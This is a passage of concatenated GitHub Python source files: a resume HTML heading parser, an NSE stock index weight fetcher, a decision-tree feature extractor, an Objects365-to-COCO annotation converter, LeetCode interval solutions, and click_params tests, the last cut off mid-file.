+{"seq_id":"18240421893","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 15 10:48:46 2019\r\n\r\n@author: NISCHAL\r\n\"\"\"\r\n\"\"\"\r\nProgram for paring the html file and finding the structure in the data\r\n\r\nGiven a html file the output is a csv file with the parameters defining the attributes of the string(text)\r\n\r\nMakes use of BeautifulSoup package for parsing the html data.\r\n\"\"\"\r\n\r\n# Importing BeautifulSoup\r\nimport bs4\r\nfrom bs4 import BeautifulSoup\r\n\r\n# Importing csv\r\nimport csv\r\n\r\ndef file_open(file_name):\r\n\t\"\"\"\r\n\tOpens the html file and converts it into Beautiful Soup object\r\n\r\n\tParams : file_name - Name of the file to be opened\r\n\r\n\tReturns : body_contents - a BeautifulSoup object\r\n\t\"\"\"\r\n\tif '.html' in file_name:\r\n\t\twith open(file_name, 'rb') as fp:\r\n\t\t\tsoup = BeautifulSoup(fp.read(), features = \"lxml\")\r\n\t\t\tbody_contents = soup.body.contents\r\n\t\t\treturn body_contents\r\n\r\ndef preprocess_data(body_contents):\r\n\t\"\"\"\r\n\tFinds pattern in the HTML object and stores it\r\n\r\n\tparams : body_contents - BeautifulSoup Object\r\n\r\n\treturn : dict_data - List of dictionaries containing string name and its parameters\r\n\t\"\"\"\r\n\tdict_data = []\r\n\tfor j in range(0, len(body_contents)):\r\n\t\tinner = list()\r\n\t\tstyles = list()\r\n\t\tif type(body_contents[j]) != bs4.element.NavigableString:\r\n\t\t\tres = list(body_contents[j].children)\r\n\r\n\t\t\tfor i in range(0, len(res)):\r\n\t\t\t\tif type(res[i]) != bs4.element.NavigableString:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tstyles.append(res[i]['style'])\r\n\t\t\t\t\texcept KeyError:\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\tinner.append(list(res[i].children))\r\n\t\t\t\telse:\r\n\t\t\t\t\t#print(res[i])\r\n\t\t\t\t\tpass\r\n\r\n\t\tfor k, object in enumerate(inner):\r\n\t\t\tall_strings = ''\r\n\t\t\tall_strings = all_strings.encode('utf-8')\r\n\t\t\tfor string in object:\r\n\t\t\t\tif type(string) == bs4.element.NavigableString:\r\n\t\t\t\t\tstring = string.encode('utf-8')\r\n\t\t\t\t\tall_strings = all_strings + string\r\n\t\t\tinfo = {}\r\n\t\t\ttry:\r\n\t\t\t\tinfo['String'] = all_strings\r\n\t\t\t\tinfo['Style'] = styles[k]\r\n\t\t\t\tinfo['DIV-STYLE'] = body_contents[j]['style']\r\n\t\t\t\tdict_data.append(info)\r\n\t\t\texcept IndexError:\r\n\t\t\t\tpass\r\n\treturn dict_data\r\n\r\ndef write_csv(dict_data, f):\r\n\t\"\"\"\r\n\tWrites the found data in the csv file\r\n\r\n\tparams : dict_data - List of dictionaries each representing a string and its parameters like font size etc.\r\n\r\n\treturn : void\r\n\t\"\"\"\r\n\tcsv_cloumns = ['String', 'Font Type','Font Style', 'Font Description','Font Size','position', ' border', ' writing-mode', ' left', ' top', ' width', ' height']\r\n\tcsv_file = f.strip('.html')\r\n\tcsv_file = csv_file + '.csv'\r\n\ttry:\r\n\t\twith open(csv_file, 'w') as csvfile:\r\n\t\t\twriter = csv.DictWriter(csvfile, fieldnames = csv_cloumns)\r\n\t\t\twriter.writeheader()\r\n\r\n\t\t\tfor data in dict_data:\r\n\t\t\t\tsrc = data['Style']\r\n\t\t\t\tx = src.find(':')\r\n\t\t\t\ty = src.find('+')\r\n\t\t\t\tz = src.find(';')\r\n\t\t\t\tfont_style = src[y+1:z]\r\n\t\t\t\tm = font_style.find('-')\r\n\t\t\t\tfont_description = ''\r\n\t\t\t\tif m == -1:\r\n\t\t\t\t\tfont_description = 'default'\r\n\t\t\t\telse:\r\n\t\t\t\t\tfont_description = font_style[m+1:]\r\n\t\t\t\t\tfont_style = font_style[:m]\r\n\t\t\t\tdel data['Style']\r\n\t\t\t\tdata['Font Type'] = src[x+2:y]\r\n\t\t\t\tdata['Font Style'] = font_style\r\n\t\t\t\tdata['Font Description'] = font_description\r\n\t\t\t\tdata['Font Size'] = src[len(src)-4:]\r\n\t\t\t\tlst = data['DIV-STYLE'].split(';')\r\n\t\t\t\tdel data['DIV-STYLE']\r\n\t\t\t\tfor i in range(0, len(lst) - 1):\r\n\t\t\t\t\ta = lst[i].split(':')\r\n\t\t\t\t\tdata[str(a[0])] = str(a[1])\r\n\t\t\t\ttry:\r\n\t\t\t\t\twriter.writerow(data)\r\n\t\t\t\texcept ValueError:\r\n\t\t\t\t\tpass\r\n\texcept IOError:\r\n\t\tprint(\"I/O error\")\r\n\texcept UnicodeEncodeError:\r\n\t\tprint('unicode error')\r\n\r\ndef generate_headings(dict_data):\r\n\t\"\"\"\r\n\tGenerates a dictionary containing all strings with their corresponding heading scores\r\n\r\n\tparams : dict_data - list of set of dictionaries\r\n\r\n\treturn : heading_scores - dictionary containing all strings with their corresponding heading scores\r\n\t\"\"\"\r\n\tfonts = list()\r\n\teligible_strings = dict()\r\n\theading_scores = dict()\r\n\r\n\tfor data in dict_data:\r\n\t\theading_scores[data['String']] = 0\r\n\t\tstring = data['String'].decode()\r\n\t\tstring = string.strip('\\n')\r\n\t\tstring = string.strip('\\r')\r\n\r\n\t\tfor i in range(0, len(string)):\r\n\t\t\tstring = string.strip(' ')\r\n\t\tstring = string.strip('-')\r\n\t\tstring = string.strip(':')\r\n\r\n\t\tlst = string.split(' ')\r\n\t\tfor i in range(0, len(lst)):\r\n\t\t\tif '' in lst:\r\n\t\t\t\tlst.remove('')\r\n\r\n\t\tif len(lst) <= 3:\r\n\t\t\theading_scores[data['String']] = 1\r\n\t\tstring = string.replace(' ', '')\r\n\r\n\t\tif string.isalpha():\r\n\t\t\tdata['Font Size'] = data['Font Size'].strip(':')\r\n\t\t\teligible_strings[data['String']] = data['Font Size']\r\n\r\n\t\t\tif data['Font Size'] not in fonts:\r\n\t\t\t\tfonts.append(data['Font Size'])\r\n\r\n\t\t\tif string.isupper():\r\n\t\t\t\theading_scores[data['String']] = heading_scores[data['String']] + 1\r\n\r\n\t# Sorting the fonts\r\n\tres = list()\r\n\tfor font in fonts:\r\n\t\tfont = font.strip('px')\r\n\t\tfont = int(font)\r\n\t\tres.append(font)\r\n\r\n\tres.sort()\r\n\tfonts = list()\r\n\tfor font in res:\r\n\t\tfont = str(font)\r\n\t\tfont = font + 'px'\r\n\t\tfonts.append(font)\r\n\r\n\tfor key, value in eligible_strings.items():\r\n\t\ttry:\r\n\t\t\theading_scores[key] = heading_scores[key] + fonts.index(value)\r\n\t\texcept ValueError:\r\n\t\t\tpass\r\n\r\n\treturn heading_scores\r\n\r\ndef find_headings(heading_scores):\r\n\t\"\"\"\r\n\tFinds the possible headings of the given resume\r\n\r\n\tparams : heading_scores - dictionary containing all strings with their corresponding heading scores\r\n\r\n\treturn - headings - list of strings which are the headings\r\n\t\"\"\"\r\n\theadings = list()\r\n\ti = 0\r\n\tj = 0\r\n\tint_max = 99999\r\n\tcur = 0\r\n\tfor w in sorted(heading_scores, key = heading_scores.get, reverse = True):\r\n\t\tif j < 5:\r\n\t\t\tif heading_scores[w] < int_max:\r\n\t\t\t\tint_max = heading_scores[w]\r\n\t\t\t\ti = i +1\r\n\t\t\tif i <= 3:\r\n\t\t\t\theadings.append(w)\r\n\t\t\t\tcur = heading_scores[w]\r\n\t\telse:\r\n\t\t\tif (heading_scores[w] == cur):\r\n\t\t\t\theadings.append(w)\r\n\t\tj = j + 1\r\n\treturn headings\r\n\r\ndef main():\r\n\tbody_contents = file_open(\"..\\htmls\\\\Nischal_resume.html\")\r\n\tdict_data = preprocess_data(body_contents)\r\n\twrite_csv(dict_data, 'Nischal_resume')\r\n\theading_scores = generate_headings(dict_data)\r\n\theadings = find_headings(heading_scores)\r\n\tprint(headings)\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"Nish-19/Unsupervised_Data_Mining","sub_path":"html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12209296633","text":"import json, csv\nimport re\nimport requests\nimport os\nfrom constants import (nse_stock_list_url_dict, nse_weight_regex_pattern, index_weight_url, stock_list_url)\n\nclass Nifiio:\n def __init__(self):\n self.json_ext = '.json'\n self.csv_ext = '.csv'\n self.weightage_field_name = 'Weightage'\n \n def get_nse_index_weights(self, index_name):\n \"\"\"\n Returns a dictionary of all the stocks and their corresponding weights in the index.\n\n :param index_name: Name of the index\n :rtype: dict\n \"\"\"\n #prepare and send request to fetch data\n print(\"Fetching data for index {}\".format(index_name))\n url = index_weight_url.format(index_name.upper())\n # print('URL: {}'.format(url)) \n response = requests.get(url, timeout=10)\n print('Request URL: {}'.format(response.url))\n response_text = None\n \n if response.status_code != 200:\n print('Failed to get data: ', response.status_code)\n return None\n else:\n response_text = response.text\n \n #Compile regex and search in response text to fetch 'label:' <weight> from response \n if response_text is not None:\n print('Response received - parsing')\n # nse_json_regex_pattern = self.nse_weight_regex_pattern\n # pattern = re.compile(nse_json_regex_pattern)\n index_weight_data = nse_weight_regex_pattern.findall(response_text)\n # print(index_weight_data)\n\n #convert to dict form\n weight_data_dict = dict(st.rsplit(' ', 1) for st in index_weight_data)\n # print(weight_data_dict)\n weight_int_dict =\\\n {key : float(value.replace('%','')) for key, value in weight_data_dict.items()}\n \n return weight_int_dict\n else:\n print('Error: Response is empty!')\n return None\n \n \n def get_nse_index_stocklist(self, index_name):\n \"\"\"\n Returns a list of stocks in the index as a list of `OrderedDict` types.\n Each `OrderedDict` represents information of a stock in the index. Weights are not included.\n \n :param index_name: Name of the index\n :rtype: OrderedDict\n \"\"\"\n #prepare and send request to fetch data\n if index_name in nse_stock_list_url_dict:\n url = nse_stock_list_url_dict.get(index_name)\n else:\n trim_index_name = re.sub(r'\\s+', '', index_name)\n print(\"Fetching list of stocks for index {}\".format(index_name))\n url = stock_list_url.format(trim_index_name.lower())\n\n response = requests.get(url, timeout=10)\n print('Request URL: {}'.format(response.url))\n\n if response.status_code != 200:\n print('Failed to get data: ', response.status_code)\n return None\n else:\n response_text_split = response.text.splitlines()\n if response is not None:\n print('Response received - reading csv') \n reader = csv.DictReader(response_text_split)\n stock_list = list(reader) \n return stock_list\n else:\n print('Error: Response is empty!')\n return None\n\n def get_stocks_and_weights(self, index_name, write_to_file=False, file_types=None, write_to_file_path=None):\n \"\"\"Combines fetched stock data together with weights for a more comprehensive list containing details of stocks in the index, each stock represented by an `OrderedDict`.\n Data fetched can also be written to csv and json depending on the optional params.\n \n :param index_name: Name of the index\n :rtype: OrderedDict \n \"\"\"\n \n stock_list = self.get_nse_index_stocklist(index_name = index_name)\n weight_dict = self.get_nse_index_weights(index_name = index_name)\n trim_index_name = re.sub(r'\\s+', '', index_name)\n\n if stock_list is None or weight_dict is None:\n print('Couldn\\'t fetch stock data and/or weights!')\n return None\n\n # merge weight from list of weights into stock data using symbol\n print('Merging weights and stock info')\n for stock in stock_list:\n symbol = stock.get('Symbol')\n # print('Getting weight for symbol: {}'.format(symbol))\n weight = weight_dict.get(symbol)\n # print('Weight for {0} is {1}'.format(symbol, weight))\n stock[self.weightage_field_name] = weight\n \n if write_to_file is True:\n write_to_file_path = '' if write_to_file_path is None else str(write_to_file_path)\n if not os.path.isdir(write_to_file_path) and write_to_file_path is not None:\n print('Creating new directory')\n try:\n os.makedirs(write_to_file_path)\n except OSError:\n print('Error creating directory!')\n return stock_list\n\n if 'csv' in file_types:\n print('Writing to csv file.')\n output_file = write_to_file_path + 'index_data_weights_{}'.format(trim_index_name) + self.csv_ext\n\n #get field names from stock list \n for stock in stock_list[:1]:\n field_names = list(stock.keys())\n\n with open(output_file, 'w', newline='') as outfile:\n writer = csv.DictWriter(outfile, fieldnames=field_names)\n print('Field names: ', field_names)\n writer.writeheader()\n writer.writerows(stock_list)\n \n if 'json' in file_types:\n print('Writing to json file.')\n output_file = write_to_file_path + 'index_data_weights_{}'.format(trim_index_name) + self.json_ext\n\n with open(output_file, 'w') as outfile:\n json.dump(stock_list, outfile) \n else:\n print('Skipped writing to file')\n\n return stock_list","repo_name":"lamavar/nifiio","sub_path":"nifiio/nifiio.py","file_name":"nifiio.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"34043335257","text":"import csv,operator,sys,os\nimport numpy as np\nimport sklearn\nimport json\nfrom functools import reduce\n\nsys.path.append('../arch-forest/data/adult/')\nsys.path.append('../arch-forest/data/')\nsys.path.append('../arch-forest/code/')\n\nimport Tree\n\n# Utility functions to ensure compatibility between my frequent trees and Sebastians decision trees \n\ndef _getMaxVertexId(vertex):\n if 'leftChild' in vertex.keys():\n leftMax = _getMaxVertexId(vertex['leftChild'])\n else:\n leftMax = 0\n \n if 'rightChild' in vertex.keys():\n rightMax = _getMaxVertexId(vertex['rightChild'])\n else:\n rightMax = 0\n\n return max(leftMax, rightMax, vertex['id'])\n\n\ndef _fillMembers(vertex, maxId):\n # ensure that all required members are there and that the tree is (unbalanced) binary\n if 'numSamples' not in vertex.keys():\n vertex['numSamples'] = 0\n\n # TODO this is just a temporary fix to get it to run. should be thought through more thoroughly...\n if 'feature' in vertex.keys():\n if 'probLeft' not in vertex.keys():\n vertex['probLeft'] = 0\n if 'probRight' not in vertex.keys():\n vertex['probRight'] = 0\n if 'isCategorical' not in vertex.keys():\n vertex['isCategorical'] = False\n if 'feature' not in vertex.keys():\n vertex['feature'] = 0\n if 'split' not in vertex.keys():\n vertex['split'] = 0\n\n # ensure that split nodes have two children\n if 'leftChild' in vertex.keys():\n maxId = _fillMembers(vertex['leftChild'], maxId)\n else:\n maxId += 1\n vertex['leftChild'] = {'id':maxId, 'numSamples':0, 'prediction':list()} \n if 'rightChild' in vertex.keys():\n maxId = _fillMembers(vertex['rightChild'], maxId)\n else:\n maxId += 1\n vertex['rightChild'] = {'id':maxId, 'numSamples':0, 'prediction':list()}\n\n return maxId\n\ndef makeProperBinaryDT(vertex):\n maxUsedVertexId = _getMaxVertexId(vertex)\n _fillMembers(vertex, maxUsedVertexId)\n return vertex\n\n\nclass FeatureGeneratingTree(Tree.Tree):\n \"\"\"A subclass of Sebastian Buschjäger et al.'s Tree class.\n It extends it to have a function like predict that returns the leaf node id on which the data maps\n instead of the prediction given by that node.\"\"\"\n \n def __init__(self, pattern):\n super(FeatureGeneratingTree, self).__init__()\n self.fromJSON(makeProperBinaryDT(pattern))\n self.n_nodes = len(self.nodes)\n\n \n def get_features(self, x, output=0):\n ''' to get nodeId set output as 0, to get count of comparisons set output to 1'''\n curNode = self.head\n counter = 0 \n\n # walk through the (partial) decision tree as long as possible\n while(curNode.prediction == None):\n counter +=1\n if (x[curNode.feature] <= curNode.split): \n curNode = curNode.leftChild\n else:\n curNode = curNode.rightChild\n if (output == 0): \n return curNode.id\n else:\n return counter\n #return counter\n #self.x_counter +=1\n \n def get_features_batch(self, X, output=0):\n return np.array([self.get_features(x, output) for x in X])\n\n\nclass FrequentSubtreeFeatures():\n \"\"\"A feature extraction algorithm that transforms you data point(s) x into a categorical feature space F\n corresponding to a random forest R. Each feature f in F corresponds to a decision tree T in the random forest R\n and each value of f corresponds to a leaf of T. That is, f(x) is the id of the leaf of T in which x would end up in.\n\n Most likely, you want to transform the features created here to a one-hot encoding. See the documentation of\n get_n_values() for some hints.\n \"\"\"\n\n def __init__(self, patterns=None):\n \"\"\"Init a new Feature Extractor Object corresponding to a random forest given as a list of decision trees as\n parsed json objects in the format used by Sebastian Buschjäger et al.\n ( available via git: git clone git@bitbucket.org:sbuschjaeger/arch-forest.git )\n\n Mainly used to create Feature Extractors that correspond to sets of frequent rooted subtrees in random forests.\n \"\"\"\n self.patterns = [FeatureGeneratingTree(pattern) for pattern in patterns]\n self.n_features = len(self.patterns)\n\n def get_n_values(self):\n \"\"\" Return the size of the feature set if the model is based on a single tree\n or a list of sizes of the individual feature sets of all trees in the model if there are more than one tree.\n\n This method is compatible with sklearn.preprocessing.OneHotEncoder in the following way:\n\n To allow OneHotEncoding with a fixed number of features that does not depend on the data,\n but only on the FeatureGeneratingTrees present in the model, use the following code:\n\n dsf = DecisionSnippetFeatures.FrequentSubtreeFeatures(map(lambda x: x['pattern'], frequentpatterns[-100:]))\n fts = dsf.fit_transform(X)\n fts_onehot = OneHotEncoder(n_values=dsf.get_n_values()).fit_transform(fts)\n \"\"\"\n size_list = [pattern.n_nodes for pattern in self.patterns]\n if len(size_list) == 1:\n return size_list[0]\n else:\n return size_list\n\n def get_categories(self):\n \"\"\" Variant of the above that is hopefully compatible with the sklearn.preprocessing.OneHotEncoder of newer sklearn versions\"\"\"\n size_list = [pattern.n_nodes for pattern in self.patterns]\n return [range(leaves) for leaves in size_list]\n \n def fit(self, X=None, y=None):\n \"\"\"Nothing to be done. The fitting already happenened during the creation of the random forest/decision tree/\n frequent rooted subtree models.\"\"\"\n pass\n \n def transform(self, X, output=0):\n \"\"\"Compute the ids of the leafs of the decision trees that the data points end up in. (default)\n Or compute the number of comparisons made during leaf id inference\"\"\"\n return np.stack([pattern.get_features_batch(X, output) for pattern in self.patterns]).T\n\n def fit_transform(self, X, output=0, y=None):\n \"\"\"Equivalent to transform(X).\n Compute the ids of the leafs of the decision trees that the data points end up in. (default)\n Or compute the number of comparisons made during leaf id inference\"\"\"\n return self.transform(X, output)\n\n","repo_name":"pwelke/DecisionSnippetFeatures","sub_path":"dsf/DecisionSnippetFeatures.py","file_name":"DecisionSnippetFeatures.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"72652831357","text":"import argparse\nimport json\nimport os\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\nfrom detectron2.data.detection_utils import read_image\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Convert Objects365 annotations into MS Coco format\"\n )\n parser.add_argument(\"--root_dir\", dest=\"root_dir\", help=\"path to objects365 data\", type=str)\n parser.add_argument(\n \"--apply_exif\",\n dest=\"apply_exif\",\n action=\"store_true\",\n help=\"apply the exif orientation correctly\",\n )\n parser.add_argument(\n \"--subsets\",\n type=str,\n nargs=\"+\",\n default=[\"val\", \"train\"],\n choices=[\"train\", \"val\", \"test\", \"minival\"],\n help=\"subsets to convert\",\n )\n parser.add_argument(\"--image_info_path\", type=str, help=\"image_info_path\")\n args = parser.parse_args()\n return args\n\n\nargs = parse_args()\nroot_dir = args.root_dir\n\nif args.apply_exif:\n print(\"-\" * 60)\n print(\"We will apply exif orientation...\")\n print(\"-\" * 60)\n\nif not isinstance(args.subsets, list):\n args.subsets = [args.subsets]\n\n\nfor subset in args.subsets:\n # Convert annotations\n print(\"converting {} data\".format(subset))\n\n # Select correct source files for each subset\n if subset == \"train\":\n json_name = \"zhiyuan_objv2_train.json\"\n elif subset == \"val\":\n json_name = \"zhiyuan_objv2_val.json\"\n elif subset == \"minival\":\n json_name = \"zhiyuan_objv2_val.json\"\n\n # Load original annotations\n print(\"loading original annotations ...\")\n json_path = os.path.join(root_dir, \"annotations\", json_name)\n json_data = json.load(open(json_path, \"r\"))\n print(\"loading original annotations ... Done\")\n\n print(json_data.keys())\n oi = {}\n\n # Add basic dataset info\n print(\"adding basic dataset info\")\n\n # Add license information\n print(\"adding basic license info\")\n oi[\"licenses\"] = json_data[\"licenses\"]\n\n # Convert category information\n print(\"converting category info\")\n oi[\"categories\"] = json_data[\"categories\"]\n\n # Convert image mnetadata\n print(\"converting image info ...\")\n images = json_data[\"images\"]\n if subset == \"minival\":\n images = images[:5000]\n print(f\"{len(images)} images get\")\n rm_image_ids = []\n\n if args.apply_exif:\n image_info = {}\n with open(args.image_info_path, \"r\") as f:\n for line in f.readlines():\n line = line.strip().split()\n image_id, file_name, height, width, channel = line\n\n image_id = int(image_id)\n height = int(height)\n width = int(width)\n\n image_info[image_id] = [file_name, height, width]\n\n print(f\"{len(image_info)} image_info get\")\n\n new_images = []\n for img in tqdm(images):\n image_id = img[\"id\"]\n\n if image_id not in image_info.keys():\n rm_image_ids.append(image_id)\n print(\"removing\", img)\n continue\n\n file_name, height, width = image_info[image_id]\n\n assert file_name == img[\"file_name\"]\n\n if width != img[\"width\"] or height != img[\"height\"]:\n print(\"before exif correction: \", img)\n img[\"width\"], img[\"height\"] = width, height\n print(\"after exif correction: \", img)\n\n new_images.append(img)\n images = new_images\n\n oi[\"images\"] = images\n print(f\"{len(images)} images keep\")\n\n # Convert instance annotations\n print(\"converting annotations ...\")\n annotations = json_data[\"annotations\"]\n print(f\"{len(annotations)} annotations get\")\n\n annotations = [ann for ann in annotations if ann[\"image_id\"] not in rm_image_ids]\n if subset == \"minival\":\n keep_image_ids = [img[\"id\"] for img in images]\n annotations = [ann for ann in annotations if ann[\"image_id\"] in keep_image_ids]\n\n oi[\"annotations\"] = annotations\n print(f\"{len(annotations)} annotations keep\")\n\n # Write annotations into .json file\n json_path = os.path.join(root_dir, \"annotations/\", \"objects365_{}.json\".format(subset))\n print(\"writing output to {}\".format(json_path))\n json.dump(oi, open(json_path, \"w\"))\n print(\"Done\")\n","repo_name":"shenyunhang/LPM","sub_path":"datasets/tools/objects3652coco/convert_annotations.py","file_name":"convert_annotations.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2310290264","text":"\"\"\"\n# Definition for an Interval.\nclass v:\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\"\"\"\nclass Solution:\n def employeeFreeTime1(self, schedule: 'list<list<Interval>>') -> 'list<Interval>':\n worktime = []\n for i in schedule:\n for j in i:\n worktime.append(j)\n worktime = sorted(worktime, key=lambda x: x.start)\n if not worktime: return []\n pre_end = worktime[0].end\n res = []\n for i in worktime:\n if i.start > pre_end:\n res.append(Interval(pre_end, i.start))\n pre_end = i.end\n if pre_end < i.end:\n pre_end = i.end\n return res\n \n def employeeFreeTime(self, schedule: 'list<list<Interval>>') -> 'list<Interval>':\n worktime = []\n for i in schedule:\n for j in i:\n worktime.append((j.start, 0))\n worktime.append((j.end, 1))\n worktime.sort()\n pre = None\n res = []\n bal = 0\n for i,j in worktime:\n if pre is not None and bal == 0:\n res.append(Interval(pre, i))\n bal += 1 if j == 0 else -1\n pre = i\n return res\n","repo_name":"PaulGuo5/Leetcode-notes","sub_path":"notes/0759/0759.py","file_name":"0759.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74706851195","text":"from decimal import Decimal\n\nimport click\nimport pytest\n\nfrom click_params.miscellaneous import (\n JSON,\n MAC_ADDRESS,\n ChoiceListParamType,\n DateTimeListParamType,\n FirstOf,\n JsonParamType,\n MacAddressListParamType,\n StringListParamType,\n UUIDListParamType,\n)\nfrom tests.helpers import assert_equals_output, assert_in_output\n\n\n@pytest.mark.parametrize(\n ('parameter', 'name'),\n [\n (JSON, 'json'),\n (MAC_ADDRESS, 'mac address'),\n (StringListParamType(), 'string list'),\n (ChoiceListParamType(['a', 'b', 'c']), 'choice list'),\n (MacAddressListParamType(), 'mac address list'),\n (UUIDListParamType(), 'uuid list'),\n (DateTimeListParamType(), 'datetime list'),\n ],\n)\ndef test_parameter_name_and_representation_are_correct(parameter, name):\n assert name == parameter.name\n assert name.upper() == repr(parameter)\n\n\n@pytest.mark.parametrize(\n ('parameter', 'expression', 'message'),\n [\n (JSON, '2019-06-17', 'json string'),\n (JSON, '2f', 'json string'),\n (MAC_ADDRESS, '00:00:00:00:00', 'mac address'),\n (MAC_ADDRESS, 'foo', 'mac address'),\n ],\n)\ndef test_should_print_error_when_giving_incorrect_option_for_simple_types(runner, parameter, expression, message):\n @click.command()\n @click.option('-v', 'value', type=parameter)\n def cli(value):\n click.echo(value)\n\n result = runner.invoke(cli, ['-v', expression])\n\n assert_in_output(2, f'{expression} is not a valid {message}', result)\n\n\n@pytest.mark.parametrize(\n ('parameter', 'expression', 'message'),\n [\n (\n MacAddressListParamType(' '),\n 'D4:6A:6A:12:B0:75 foo 00:00:00:00:00',\n \"mac addresses: ['foo', '00:00:00:00:00']\",\n ),\n (UUIDListParamType(' '), 'foo a7309d0b-c858-4d54-b6e1-1c20f8c22047 142-48dr', \"uuid: ['foo', '142-48dr']\"),\n (DateTimeListParamType(' '), '145 2019-01-01 2019/01/01', \"datetimes: ['145', '2019/01/01']\"),\n ],\n)\ndef test_should_print_error_when_giving_incorrect_option_for_list_types(runner, parameter, expression, message):\n @click.command()\n @click.option('-v', 'values', type=parameter)\n def cli(values):\n click.echo(values)\n\n result = runner.invoke(cli, ['-v', expression])\n\n assert_in_output(2, f'These items are not {message}', result)\n\n\n@pytest.mark.parametrize(\n ('parameter', 'expression', 'expected_output'),\n [\n (JSON, '2', '2\\n'),\n (JSON, '\"1.5\"', '1.5\\n'),\n (JSON, '{\"b\": 2, \"a\": \"foo\"}', \"{'b': 2, 'a': 'foo'}\\n\"),\n (MAC_ADDRESS, '01:23:45:67:ab:CD', '01:23:45:67:ab:CD\\n'),\n ],\n)\ndef test_should_print_correct_output_when_giving_correct_option_for_simple_types(\n runner, parameter, expression, expected_output\n):\n @click.command()\n @click.option('-j', 'json_string', type=parameter)\n def cli(json_string):\n click.echo(json_string)\n\n result = runner.invoke(cli, ['-j', expression])\n\n assert_equals_output(0, expected_output, result)\n\n\n@pytest.mark.parametrize(\n ('parameter', 'expression', 'expected_output'),\n [\n # string list\n (StringListParamType(), 'foo,bar', \"['foo', 'bar']\\n\"),\n (StringListParamType(), '', \"['']\\n\"),\n (StringListParamType(' '), '1 2 foo', \"['1', '2', 'foo']\\n\"),\n # choice list\n (ChoiceListParamType(['a', 'b', 'c']), 'a,b', \"['a', 'b']\\n\"),\n (ChoiceListParamType(['a', 'b', 'c'], separator=' '), 'a b c', \"['a', 'b', 'c']\\n\"),\n # mac address list\n (\n MacAddressListParamType(),\n 'D4:6A:6A:12:B0:75,01:23:45:67:ab:CD',\n \"['D4:6A:6A:12:B0:75', '01:23:45:67:ab:CD']\\n\",\n ),\n (\n MacAddressListParamType(' '),\n 'D4:6A:6A:12:B0:75 01:23:45:67:ab:CD',\n \"['D4:6A:6A:12:B0:75', '01:23:45:67:ab:CD']\\n\",\n ),\n # uuid list\n (\n UUIDListParamType(),\n 'a7309d0b-c858-4d54-b6e1-1c20f8c22047,bfa65f3c-e6ac-4844-8e09-e84535f8cdc5',\n \"[UUID('a7309d0b-c858-4d54-b6e1-1c20f8c22047'), UUID('bfa65f3c-e6ac-4844-8e09-e84535f8cdc5')]\\n\",\n ),\n (\n UUIDListParamType(' '),\n 'a7309d0b-c858-4d54-b6e1-1c20f8c22047 bfa65f3c-e6ac-4844-8e09-e84535f8cdc5',\n \"[UUID('a7309d0b-c858-4d54-b6e1-1c20f8c22047'), UUID('bfa65f3c-e6ac-4844-8e09-e84535f8cdc5')]\\n\",\n ),\n # datetime list\n (\n DateTimeListParamType(),\n '2019-01-01,2019-01-01 01:00:00',\n '[datetime.datetime(2019, 1, 1, 0, 0), datetime.datetime(2019, 1, 1, 1, 0)]\\n',\n ),\n (\n DateTimeListParamType(', '),\n '2019-01-01, 2019-01-01 01:00:00',\n '[datetime.datetime(2019, 1, 1, 0, 0), datetime.datetime(2019, 1, 1, 1, 0)]\\n',\n ),\n ],\n)\ndef test_should_print_correct_output_when_giving_correct_option_for_list_types(\n runner, parameter, expression, expected_output\n):\n @click.command()\n @click.option('-v', 'values', type=parameter)\n def cli(values):\n click.echo(values)\n\n result = runner.invoke(cli, ['-v', expression])\n\n assert_equals_output(0, expected_output, result)\n\n\n@pytest.mark.parametrize(\n \"param_type\", [StringListParamType, MacAddressListParamType, UUIDListParamType, DateTimeListParamType]\n)\ndef test_miscellaneous_list_param_types_ignore_empty_string(param_type):\n misc_list_type = param_type(ignore_empty=True)\n\n assert misc_list_type.convert(\"\", None, None) == []\n\n\ndef test_cli_with_multiple_similar_string_list_param_types(runner):\n @click.command()\n @click.option('-v', 'values', type=StringListParamType(\",\"))\n def cli(values):\n click.echo(values)\n\n result = runner.invoke(cli, ['-v', \"abc,def\"])\n\n assert result.output == \"['abc', 'def']\\n\"\n\n result = runner.invoke(cli, ['-v', \"abc,def\"])\n\n assert result.output == \"['abc', 'def']\\n\"\n\n\nclass TestJsonParamType:\n \"\"\"Tests JsonParamType specific cases\"\"\"\n\n def test_should_call_json_loads_with_correct_arguments(self, mocker):\n loads_mock = mocker.patch('json.loads')\n json_type = JsonParamType(parse_float=Decimal, parse_int=int, parse_constant=Decimal)\n json_type.convert(2, None, None)\n\n loads_mock.assert_called_once_with(\n 2,\n cls=None,\n object_hook=None,\n parse_float=Decimal,\n parse_int=int,\n parse_constant=Decimal,\n object_pairs_hook=None,\n )\n\n\nclass TestFirstOf:\n \"\"\"Test class FirstOf\"\"\"\n\n def test_class_representation_is_correct(self):\n class CoreNumber(FirstOf):\n name = 'core number'\n\n assert 'CORE NUMBER' == repr(CoreNumber(click.INT, click.Choice(['all', 'half'])))\n assert 'CORE NUMBER' == repr(FirstOf(click.INT, click.Choice(['all', 'half']), name='core number'))\n assert '(INTEGER | CHOICE)' == repr(FirstOf(click.INT, click.Choice(['all', 'half'])))\n\n @pytest.mark.parametrize(\n ('expression', 'param_types', 'value'),\n [\n ('12', (click.INT,), 12),\n ('auto', (click.Choice(['auto', 'full']), click.INT), 'auto'),\n ('full', (click.Choice(['auto', 'full']), click.INT), 'full'),\n ('12', (click.Choice(['auto', 'full']), click.INT), 